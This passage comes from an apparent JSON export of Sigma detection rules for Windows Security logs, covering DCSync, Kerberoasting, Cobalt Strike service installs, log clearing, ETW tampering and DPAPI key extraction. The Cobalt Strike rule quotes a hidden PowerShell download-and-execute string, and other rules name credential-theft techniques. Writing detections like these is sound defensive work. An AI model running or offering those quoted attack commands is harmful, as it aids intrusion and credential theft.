    "content": "title: Add or Remove Computer from DC\nid: 20d96d95-5a20-4cf1-a483-f3bda8a7c037\nstatus: test\ndescription: Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743\nauthor: frack113\ndate: 2022-10-14\ntags:\n    - attack.defense-evasion\n    - attack.t1207\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 4741\n            - 4743\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_admin_share_access.yml",
    "content": "title: Access To ADMIN$ Network Share\nid: 098d7118-55bc-4912-a836-dc6483a8d150\nstatus: test\ndescription: Detects access to ADMIN$ network share\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5140\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-04\nmodified: 2024-01-16\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The advanced audit policy setting \"Object Access > Audit File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5140\n        ShareName: 'Admin$'\n    filter_main_computer_account:\n        SubjectUserName|endswith: '$'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml",
    "content": "title: Enabled User Right in AD to Control User Objects\nid: 311b6ce2-7890-4383-a8c2-663a9f6b43cd\nstatus: test\ndescription: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.\nreferences:\n    - https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/\nauthor: '@neu5ron'\ndate: 2017-07-30\nmodified: 2021-12-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Policy Change\\Audit Authorization Policy Change'\ndetection:\n    selection_base:\n        EventID: 4704\n    selection_keywords:\n        PrivilegeList|contains: 'SeEnableDelegationPrivilege'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml",
    "content": "title: Active Directory User Backdoors\nid: 300bac00-e041-4ee2-9c36-e262656a6ecc\nstatus: test\ndescription: Detects scenarios where one can control another users or computers account without having to use their credentials.\nreferences:\n    - https://msdn.microsoft.com/en-us/library/cc220234.aspx\n    - https://adsecurity.org/?p=3466\n    - https://blog.harmj0y.net/redteaming/another-word-on-delegation/\nauthor: '@neu5ron'\ndate: 2017-04-13\nmodified: 2024-02-26\ntags:\n    - attack.privilege-escalation\n    - attack.t1098\n    - attack.persistence\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Account Management\\Audit User Account Management, DS Access > Audit Directory Service Changes, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\DS Access\\Audit Directory Service Changes'\ndetection:\n    selection1:\n        EventID: 4738\n    filter_empty:\n        AllowedToDelegateTo:\n            - ''\n            - '-'\n    filter_null:\n        AllowedToDelegateTo: null\n    selection_5136_1:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'msDS-AllowedToDelegateTo'\n    selection_5136_2:\n        EventID: 5136\n        ObjectClass: 'user'\n        AttributeLDAPDisplayName: 'servicePrincipalName'\n    selection_5136_3:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'msDS-AllowedToActOnBehalfOfOtherIdentity'\n    condition: (selection1 and not 1 of filter_*) or 1 of selection_5136_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml",
    "content": "title: Weak Encryption Enabled and Kerberoast\nid: f6de9536-0441-4b3f-a646-f4e00f300ffd\nstatus: test\ndescription: Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.\nreferences:\n    - https://adsecurity.org/?p=2053\n    - https://blog.harmj0y.net/redteaming/another-word-on-delegation/\nauthor: '@neu5ron'\ndate: 2017-07-30\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Account Management > Audit User Account Management, Group Policy : Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\Audit Policies\\Account Management\\Audit User Account Management'\ndetection:\n    selection:\n        EventID: 4738\n    # According to Microsoft, the bit values are listed here: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4720\n    # However, that seems to be a simple copy from https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/useraccountcontrol-manipulate-account-properties\n    # and the actual flags that are used are quite different and, unfortunately, not documented.\n    # https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/ contains a number of EVTX files with relevant events, which can be used to extract\n    # the following values.\n    olduac_des: # 0x8000\n        OldUacValue|endswith:\n            - 8???\n            - 9???\n            - A???\n            - B???\n            - C???\n            - D???\n            - E???\n            - F???\n    newuac_des:\n        NewUacValue|endswith:\n            - 8???\n            - 9???\n            - A???\n            - B???\n            - C???\n            - D???\n            - E???\n            - F???\n    olduac_preauth: # 0x10000\n        OldUacValue|endswith:\n            - 1????\n            - 3????\n            - 5????\n            - 7????\n            - 9????\n            - B????\n            - D????\n            - F????\n    newuac_preauth:\n        NewUacValue|endswith:\n            - 1????\n            - 3????\n            - 5????\n            - 7????\n            - 9????\n            - B????\n            - D????\n            - F????\n    olduac_encrypted: # 0x800\n        OldUacValue|endswith:\n            - 8??\n            - 9??\n            - A??\n            - B??\n            - C??\n            - D??\n            - E??\n            - F??\n    newuac_encrypted:\n        NewUacValue|endswith:\n            - 8??\n            - 9??\n            - A??\n            - B??\n            - C??\n            - D??\n            - E??\n            - F??\n    condition: selection and ((newuac_des and not olduac_des) or (newuac_preauth and not olduac_preauth) or (newuac_encrypted and not olduac_encrypted))\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_alert_ruler.yml",
    "content": "title: Hacktool Ruler\nid: 24549159-ac1b-479c-8175-d42aea947cae\nstatus: test\ndescription: This events that are generated when using the hacktool Ruler by Sensepost\nreferences:\n    - https://github.com/sensepost/ruler\n    - https://github.com/sensepost/ruler/issues/47\n    - https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4776\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4624\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-31\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.execution\n    - attack.collection\n    - attack.lateral-movement\n    - attack.t1087\n    - attack.t1114\n    - attack.t1059\n    - attack.t1550.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4776\n        Workstation: 'RULER'\n    selection2:\n        EventID:\n            - 4624\n            - 4625\n        WorkstationName: 'RULER'\n    condition: (1 of selection*)\nfalsepositives:\n    - Go utilities that use staaldraad awesome NTLM library\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_atsvc_task.yml",
    "content": "title: Remote Task Creation via ATSVC Named Pipe\nid: f6de6525-4509-495a-8a82-1f8b0ed73a00\nstatus: test\ndescription: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe\nreferences:\n    - https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html\nauthor: Samir Bousseaden\ndate: 2019-04-03\nmodified: 2024-08-01\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.lateral-movement\n    - attack.persistence\n    - car.2013-05-004\n    - car.2015-04-001\n    - attack.t1053.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName: atsvc\n        AccessList|contains: 'WriteData'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_audit_log_cleared.yml",
    "content": "title: Security Eventlog Cleared\nid: d99b79d2-0a6f-4f46-ad8b-260b6e17f982\nrelated:\n    - id: f2f01843-e7b8-4f95-a35a-d23584476423\n      type: obsolete\n    - id: a122ac13-daf8-4175-83a2-72c387be339d\n      type: obsolete\nstatus: test\ndescription: One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution\nreferences:\n    - https://twitter.com/deviouspolack/status/832535435960209408\n    - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-01-10\nmodified: 2022-02-24\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\n    - car.2016-04-002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_517:\n        EventID: 517\n        Provider_Name: Security\n    selection_1102:\n        EventID: 1102\n        Provider_Name: Microsoft-Windows-Eventlog\n    condition: 1 of selection_*\nfalsepositives:\n    - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)\n    - System provisioning (system reset before the golden image creation)\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_camera_microphone_access.yml",
    "content": "title: Processes Accessing the Microphone and Webcam\nid: 8cd538a4-62d5-4e83-810b-12d41e428d6e\nstatus: test\ndescription: Potential adversaries accessing the microphone and webcam in an endpoint.\nreferences:\n    - https://twitter.com/duzvik/status/1269671601852813320\n    - https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-07\nmodified: 2021-11-27\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4657\n            - 4656\n            - 4663\n        ObjectName|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged'\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\NonPackaged'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml",
    "content": "title: CobaltStrike Service Installations - Security\nid: d7a95147-145f-4678-b85d-d1ff4a3bb3f6\nrelated:\n    - id: 5a105d34-05fc-401e-8553-272b45c1522d\n      type: derived\nstatus: test\ndescription: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement\nreferences:\n    - https://www.sans.org/webcasts/119395\n    - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/\n    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nauthor: Florian Roth (Nextron Systems), Wojciech Lesicki\ndate: 2021-05-26\nmodified: 2022-11-27\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    event_id:\n        EventID: 4697\n    selection1:\n        ServiceFileName|contains|all:\n            - 'ADMIN$'\n            - '.exe'\n    selection2:\n        ServiceFileName|contains|all:\n            - '%COMSPEC%'\n            - 'start'\n            - 'powershell'\n    selection3:\n        ServiceFileName|contains: 'powershell -nop -w hidden -encodedcommand'\n    selection4:\n        ServiceFileName|base64offset|contains: \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:\"\n    condition: event_id and 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_codeintegrity_check_failure.yml",
    "content": "title: Failed Code Integrity Checks\nid: 470ec5fa-7b4e-4071-b200-4c753100f49b\nstatus: stable\ndescription: |\n    Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281\nauthor: Thomas Patzke\ndate: 2019-12-03\nmodified: 2025-01-19\ntags:\n    - attack.defense-evasion\n    - attack.t1027.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 5038\n            - 6281\n    filter_optional_crowdstrike:\n        param1|contains:\n            - '\\CSFalconServiceUninstallTool_'\n            - '\\Program Files\\CrowdStrike\\'\n            - '\\System32\\drivers\\CrowdStrike\\'\n            - '\\Windows\\System32\\ScriptControl64_'\n    filter_optional_sophos:\n        param1|contains: '\\Program Files\\Sophos\\'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Disk device errors\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml",
    "content": "title: DCERPC SMB Spoolss Named Pipe\nid: 214e8f95-100a-4e04-bb31-ef6cba8ce07e\nstatus: test\ndescription: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.\nreferences:\n    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n    - https://dirkjanm.io/a-different-way-of-abusing-zerologon/\n    - https://twitter.com/_dirkjan/status/1309214379003588608\nauthor: OTR (Open Threat Research)\ndate: 2018-11-28\nmodified: 2022-08-11\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ShareName: '\\\\\\\\\\*\\\\IPC$' # looking for the string \\\\*\\IPC$\n        RelativeTargetName: spoolss\n    condition: selection\nfalsepositives:\n    - 'Domain Controllers acting as printer servers too? :)'\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml",
    "content": "title: DCOM InternetExplorer.Application Iertutil DLL Hijack - Security\nid: c39f0c81-7348-4965-ab27-2fde35a1b641\nstatus: test\ndescription: Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)\ndate: 2020-10-12\nmodified: 2022-11-26\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1021.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        RelativeTargetName|endswith: '\\Internet Explorer\\iertutil.dll'\n    filter:\n        SubjectUserName|endswith: '$'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dcsync.yml",
    "content": "title: Mimikatz DC Sync\nid: 611eab06-a145-4dfa-a295-3ccc5c20f59a\nstatus: test\ndescription: Detects Mimikatz DC sync security events\nreferences:\n    - https://twitter.com/gentilkiwi/status/1003236624925413376\n    - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2\n    - https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662\nauthor: Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu\ndate: 2018-06-03\nmodified: 2022-04-26\ntags:\n    - attack.credential-access\n    - attack.s0002\n    - attack.t1003.006\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        Properties|contains:\n            - 'Replicating Directory Changes All'\n            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'\n            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'\n            - '9923a32a-3607-11d2-b9be-0000f87a36b2'\n            - '89e95b76-444d-4c62-991a-0facbeda640c'\n        AccessMask: '0x100'\n    filter1:\n        SubjectDomainName: 'Window Manager'\n    filter2:\n        SubjectUserName|startswith:\n            - 'NT AUT'\n            - 'MSOL_'\n    filter3:\n        SubjectUserName|endswith: '$'\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Valid DC Sync that is not covered by the filters; please report\n    - Local Domain Admin account used for Azure AD Connect\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_default_domain_gpo_modification.yml",
    "content": "title: Windows Default Domain GPO Modification\nid: e5ac86dd-2da1-454b-be74-05d26c769d7d\nrelated:\n    - id: dcff7e85-d01f-4eb5-badd-84e2e6be8294\n      type: similar\nstatus: experimental\ndescription: |\n    Detects modifications to Default Domain or Default Domain Controllers Group Policy Objects (GPOs).\n    Adversaries may modify these default GPOs to deploy malicious configurations across the domain.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\n    - https://adsecurity.org/?p=3377\n    - https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/\n    - https://jgspiers.com/audit-group-policy-changes/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    product: windows\n    service: security\n    definition: |\n        Enable 'Audit Directory Service Changes' in the Default Domain Controllers Policy under:\n        Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Audit Policies -> DS Access -> Audit Directory Service Changes (Success).\n        Additionally, proper SACL needs to be configured on the 'CN=Policies,CN=System,DC=<domain>,DC=<tld>' container in Active Directory to capture changes to Group Policy Objects.\ndetection:\n    selection:\n        EventID: 5136\n        ObjectClass: 'groupPolicyContainer'\n        ObjectDN|startswith:\n            - 'CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=POLICIES,CN=SYSTEM' # Default Domain Policy\n            - 'CN={6AC1786C-016F-11D2-945F-00C04FB984F9},CN=POLICIES,CN=SYSTEM' # Default Domain Controllers Policy\n    condition: selection\nfalsepositives:\n    - Legitimate modifications to Default Domain or Default Domain Controllers GPOs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_device_installation_blocked.yml",
    "content": "title: Device Installation Blocked\nid: c9eb55c3-b468-40ab-9089-db2862e42137\nstatus: test\ndescription: Detects an installation of a device that is forbidden by the system policy\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423\nauthor: frack113\ndate: 2022-10-14\ntags:\n    - attack.initial-access\n    - attack.t1200\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID: 6423\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_disable_event_auditing.yml",
    "content": "title: Windows Event Auditing Disabled\nid: 69aeb277-f15f-4d2d-b32a-55e883609563\nrelated:\n    - id: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1\n      type: derived\nstatus: test\ndescription: |\n    Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled.\n    This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed.\n    Also, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\n    Please note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.\nreferences:\n    - https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit\nauthor: '@neu5ron, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2017-11-19\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    product: windows\n    service: security\n    definition: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64\ndetection:\n    selection:\n        EventID: 4719\n        AuditPolicyChanges|contains:\n            - '%%8448' # This is \"Success removed\"\n            - '%%8450' # This is \"Failure removed\"\n    filter_main_guid:\n        # Note: We filter these GUID to avoid alert duplication as these are covered by ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1\n        SubcategoryGuid:\n            - '{0CCE9210-69AE-11D9-BED3-505054503030}' # Audit Security State Change\n            - '{0CCE9211-69AE-11D9-BED3-505054503030}' # Audit Security System Extension\n            - '{0CCE9212-69AE-11D9-BED3-505054503030}' # Audit System Integrity\n            - '{0CCE9215-69AE-11D9-BED3-505054503030}' # Audit Logon\n            - '{0CCE9217-69AE-11D9-BED3-505054503030}' # Audit Account Lockout\n            - '{0CCE921B-69AE-11D9-BED3-505054503030}' # Audit Special Logon\n            - '{0CCE922B-69AE-11D9-BED3-505054503030}' # Audit Process Creation\n            - '{0CCE922F-69AE-11D9-BED3-505054503030}' # Audit Audit Policy Change\n            - '{0CCE9230-69AE-11D9-BED3-505054503030}' # Audit Authentication Policy Change\n            - '{0CCE9235-69AE-11D9-BED3-505054503030}' # Audit User Account Management\n            - '{0CCE9236-69AE-11D9-BED3-505054503030}' # Audit Computer Account Management\n            - '{0CCE9237-69AE-11D9-BED3-505054503030}' # Audit Security Group Management\n            - '{0CCE923F-69AE-11D9-BED3-505054503030}' # Audit Credential Validation\n            - '{0CCE9240-69AE-11D9-BED3-505054503030}' # Audit Kerberos Service Ticket Operations\n            - '{0CCE9242-69AE-11D9-BED3-505054503030}' # Audit Kerberos Authentication Service'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: low # Increase this after a testing period in your environment\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_disable_event_auditing_critical.yml",
    "content": "title: Important Windows Event Auditing Disabled\nid: ab4561b1-6c7e-48a7-ad08-087cfb9ce8f1\nrelated:\n    - id: 69aeb277-f15f-4d2d-b32a-55e883609563\n      type: derived\nstatus: test\ndescription: Detects scenarios where system auditing for important events such as \"Process Creation\" or \"Logon\" events is disabled.\nreferences:\n    - https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit\n    - https://github.com/SigmaHQ/sigma/blob/ad1bfd3d28aa0ccc9656240f845022518ef65a2e/documentation/logsource-guides/windows/service/security.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-20\nmodified: 2023-11-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    product: windows\n    service: security\n    definition: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64\ndetection:\n    selection_state_success_and_failure:\n        EventID: 4719\n        SubcategoryGuid:\n            # Note: Add or remove GUID as you see fit in your env\n            - '{0CCE9210-69AE-11D9-BED3-505054503030}' # Audit Security State Change\n            - '{0CCE9211-69AE-11D9-BED3-505054503030}' # Audit Security System Extension\n            - '{0CCE9212-69AE-11D9-BED3-505054503030}' # Audit System Integrity\n            - '{0CCE9215-69AE-11D9-BED3-505054503030}' # Audit Logon\n            - '{0CCE921B-69AE-11D9-BED3-505054503030}' # Audit Special Logon\n            - '{0CCE922B-69AE-11D9-BED3-505054503030}' # Audit Process Creation\n            - '{0CCE922F-69AE-11D9-BED3-505054503030}' # Audit Audit Policy Change\n            - '{0CCE9230-69AE-11D9-BED3-505054503030}' # Audit Authentication Policy Change\n            - '{0CCE9235-69AE-11D9-BED3-505054503030}' # Audit User Account Management\n            - '{0CCE9236-69AE-11D9-BED3-505054503030}' # Audit Computer Account Management\n            - '{0CCE9237-69AE-11D9-BED3-505054503030}' # Audit Security Group Management\n            - '{0CCE923F-69AE-11D9-BED3-505054503030}' # Audit Credential Validation\n            - '{0CCE9240-69AE-11D9-BED3-505054503030}' # Audit Kerberos Service Ticket Operations\n            - '{0CCE9242-69AE-11D9-BED3-505054503030}' # Audit Kerberos Authentication Service\n        AuditPolicyChanges|contains:\n            - '%%8448' # This is \"Success removed\"\n            - '%%8450' # This is \"Failure removed\"\n    selection_state_success_only:\n        EventID: 4719\n        SubcategoryGuid: '{0CCE9217-69AE-11D9-BED3-505054503030}' # Audit Account Lockout\n        AuditPolicyChanges|contains: '%%8448'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml",
    "content": "title: ETW Logging Disabled In .NET Processes - Registry\nid: a4c90ea1-2634-4ca0-adbb-35eae169b6fc\nrelated:\n    - id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544\n      type: similar\nstatus: test\ndescription: Potential adversaries stopping ETW providers recording loaded .NET assemblies.\nreferences:\n    - https://twitter.com/_xpn_/status/1268712093928378368\n    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr\n    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables\n    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38\n    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39\n    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_\n    - https://bunnyinside.com/?term=f71e8cb9c76a\n    - http://managed670.rssing.com/chan-5590147/all_p1.html\n    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code\n    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-05\nmodified: 2022-12-20\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_etw_enabled:\n        EventID: 4657\n        ObjectName|endswith: '\\SOFTWARE\\Microsoft\\.NETFramework'\n        ObjectValueName: 'ETWEnabled'\n        NewValue: 0\n    selection_complus:\n        EventID: 4657\n        ObjectName|contains: '\\Environment'\n        ObjectValueName:\n            - 'COMPlus_ETWEnabled'\n            - 'COMPlus_ETWFlags'\n        NewValue: 0\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml",
    "content": "title: DPAPI Domain Backup Key Extraction\nid: 4ac1f50b-3bd0-4968-902d-868b4647937e\nstatus: test\ndescription: Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-06-20\nmodified: 2022-02-24\ntags:\n    - attack.credential-access\n    - attack.t1003.004\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        ObjectType: 'SecretObject'\n        AccessMask: '0x2'\n        ObjectName|contains: 'BCKUPKEY'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml",
